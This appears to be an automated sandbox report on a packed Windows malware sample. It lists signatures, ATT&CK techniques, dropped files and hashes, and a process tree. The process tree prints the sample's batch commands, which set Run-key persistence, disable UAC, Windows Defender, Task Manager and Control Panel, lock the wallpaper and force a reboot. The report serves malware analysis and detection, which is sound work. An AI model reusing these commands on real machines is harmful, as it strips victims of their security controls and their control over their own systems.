9a8a71e84dbbcea6ca2286d811db5d2df586d01e13654b034f77ffd6dbed599a

Analysis

max time kernel
50s
max time network
56s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
04/02/2024, 05:51

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

240204-b61b1seff6.exe
Size

11.5MB
MD5

cbefa3dd01682c7ae01476a35c069ca8
SHA1

0a7fde7402d314993d0b77b87b796f480c8bbec4
SHA256

9a8a71e84dbbcea6ca2286d811db5d2df586d01e13654b034f77ffd6dbed599a
SHA512

41a1dff4610230d1cf72c0c42b6c7eef8a12c991cb42ed28cd2268f20f1978b14fba9e17081cdbe411963bc7dcd3273046d1ddc7427f6d9cc117ea592833ed8d
SSDEEP

196608:knW3NrRSIGB4e6rVwKQ8QNeL8W6sXh9rcWdTXfxo5FKKxuAUKPZ7CwI7qMh:kn/r6CKENjsXr9TX5rKRCwI7

Score

10^/10

evasion persistence ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 3 IoCs

resource	yara_rule
behavioral2/memory/4668-14-0x0000000000400000-0x00000000014D1000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender
behavioral2/files/0x0006000000023206-18.dat	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender
behavioral2/memory/4668-30-0x0000000000400000-0x00000000014D1000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender

UPX dump on OEP (original entry point) 3 IoCs

resource	yara_rule
behavioral2/memory/4668-0-0x0000000000400000-0x00000000014D1000-memory.dmp	UPX
behavioral2/memory/4668-14-0x0000000000400000-0x00000000014D1000-memory.dmp	UPX
behavioral2/memory/4668-30-0x0000000000400000-0x00000000014D1000-memory.dmp	UPX

Disables Task Manager via registry modification
evasion

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4668-0-0x0000000000400000-0x00000000014D1000-memory.dmp	upx
behavioral2/memory/4668-14-0x0000000000400000-0x00000000014D1000-memory.dmp	upx
behavioral2/memory/4668-30-0x0000000000400000-0x00000000014D1000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\mbrsetup = "c:\\windows\\winbase_base_procid_none\\secureloc0x65\\mbrsetup.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\gdifuncs = "c:\\windows\\winbase_base_procid_none\\secureloc0x65\\gdifuncs.exe"	reg.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp"	reg.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	\??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe	cmd.exe
File opened for modification	\??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe	cmd.exe
File created	\??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav	cmd.exe
File opened for modification	\??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav	cmd.exe
File created	\??\c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe	cmd.exe
File opened for modification	\??\c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe	cmd.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "104"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

pid	Process
5016	reg.exe
1924	reg.exe
1948	reg.exe
5048	reg.exe
4000	reg.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1060	shutdown.exe
Token: SeRemoteShutdownPrivilege	1060	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1628	LogonUI.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 4668 wrote to memory of 1828	4668	240204-b61b1seff6.exe	85
PID 4668 wrote to memory of 1828	4668	240204-b61b1seff6.exe	85
PID 4668 wrote to memory of 1828	4668	240204-b61b1seff6.exe	85
PID 1828 wrote to memory of 5016	1828	cmd.exe	94
PID 1828 wrote to memory of 5016	1828	cmd.exe	94
PID 1828 wrote to memory of 5016	1828	cmd.exe	94
PID 1828 wrote to memory of 1924	1828	cmd.exe	95
PID 1828 wrote to memory of 1924	1828	cmd.exe	95
PID 1828 wrote to memory of 1924	1828	cmd.exe	95
PID 1828 wrote to memory of 4868	1828	cmd.exe	96
PID 1828 wrote to memory of 4868	1828	cmd.exe	96
PID 1828 wrote to memory of 4868	1828	cmd.exe	96
PID 1828 wrote to memory of 4992	1828	cmd.exe	97
PID 1828 wrote to memory of 4992	1828	cmd.exe	97
PID 1828 wrote to memory of 4992	1828	cmd.exe	97
PID 1828 wrote to memory of 1948	1828	cmd.exe	98
PID 1828 wrote to memory of 1948	1828	cmd.exe	98
PID 1828 wrote to memory of 1948	1828	cmd.exe	98
PID 1828 wrote to memory of 5048	1828	cmd.exe	99
PID 1828 wrote to memory of 5048	1828	cmd.exe	99
PID 1828 wrote to memory of 5048	1828	cmd.exe	99
PID 1828 wrote to memory of 1704	1828	cmd.exe	100
PID 1828 wrote to memory of 1704	1828	cmd.exe	100
PID 1828 wrote to memory of 1704	1828	cmd.exe	100
PID 1828 wrote to memory of 4000	1828	cmd.exe	101
PID 1828 wrote to memory of 4000	1828	cmd.exe	101
PID 1828 wrote to memory of 4000	1828	cmd.exe	101
PID 1828 wrote to memory of 4980	1828	cmd.exe	102
PID 1828 wrote to memory of 4980	1828	cmd.exe	102
PID 1828 wrote to memory of 4980	1828	cmd.exe	102
PID 1828 wrote to memory of 1060	1828	cmd.exe	103
PID 1828 wrote to memory of 1060	1828	cmd.exe	103
PID 1828 wrote to memory of 1060	1828	cmd.exe	103

C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe
"C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4668
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\HorrorTubies.bat""
  2⤵
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:1828
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mbrsetup /d c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:5016
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v gdifuncs /d c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1924
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:4868
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1948
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:5048
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4000
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    PID:4980
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 00
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1060

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3993055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\HorrorTubies.bat

Filesize
1KB

MD5
f014698e88eda534c88ce46a17e34d3c

SHA1
5f33f606179fea1404144d60af54fb829ea108b5

SHA256
35eda9f76ede828a68e030a5b966fbf6a8c3f67146099eb0a866fb492733c909

SHA512
79360bdc41762c105fecb07ca97fb4336394d2189f111b7040643d02c12481561aaf6b47c91c685cb7e4396c1a37d8c8eff5d4965baafe83894948316b35805f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\bg.bmp

Filesize
2.2MB

MD5
a91e5b7686d4f631a2bdf654a3a491f1

SHA1
d5760f5c7463b588b0c74bbc86237aed136b9fe9

SHA256
45991d6379452ead78a54e3be31eb3fe9c6ae386737482192ded081832044aea

SHA512
86cee44d58c7d9ed51caffb6cb6b55184a3c4653dc76ca41f4bb8a7c5bef9b67cf7f920db2111c1a838930bf9171ff49e17e042d9d0ce13205f13e7a364e1a3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\gdifuncs.exe

Filesize
76KB

MD5
9b104d42649fa52651a2ec25d7e48322

SHA1
d9fe22ef9daf5055519ebb9e4137a7b6b5ffc030

SHA256
23aef8bc6d0dcad2089fd08ec5932aba5feab3972b07583fa50d4c794eca5af9

SHA512
55794cbd02f8678fdc44dced755ba4cf9d4ed63a30bded6635dc5403ffa2435339422288d48a8ef31fe523b080359b051e86ec8f6823b891e83ed1495fa5daa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\mainbgtheme.wav

Filesize
11.9MB

MD5
6c372ee0f913e4a6e4e2f6904811e9fe

SHA1
708c269055c6d4ac8c140ac6c34f246449415724

SHA256
886ea9c5bd22cf801be7b981f4ba016c48accdf66eb66b1dd8c7fafb2e2b96ae

SHA512
368f13e54d87bcca012f7be744d3a7df745fed72d11c11423acdc057d3f667b698b0617e9df2e2470ded607935270263edd0318a8022d32d5a8457e7d22d295c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\mbrsetup.exe

Filesize
1.3MB

MD5
4f9777b4f603a437abedb856d09d42ba

SHA1
9a50bdb720e937ae6a8fd4140233b600414b393e

SHA256
c5309feb33af8626132eb1a44e528c3317b5499a87170044eadc56ae82b1bacd

SHA512
c6971d5256feb8ebd75b758055843870fd1beede3430efc82f4e3f0dae56d9b9241b0ac8c653d5f5ab3fe61a80729c4e096b169d16d2e09ccb7efcc0be8d49a8

Download Submit
memory/4668-0-0x0000000000400000-0x00000000014D1000-memory.dmp

Filesize
16.8MB

Download
memory/4668-14-0x0000000000400000-0x00000000014D1000-memory.dmp

Filesize
16.8MB

Download
memory/4668-30-0x0000000000400000-0x00000000014D1000-memory.dmp

Filesize
16.8MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads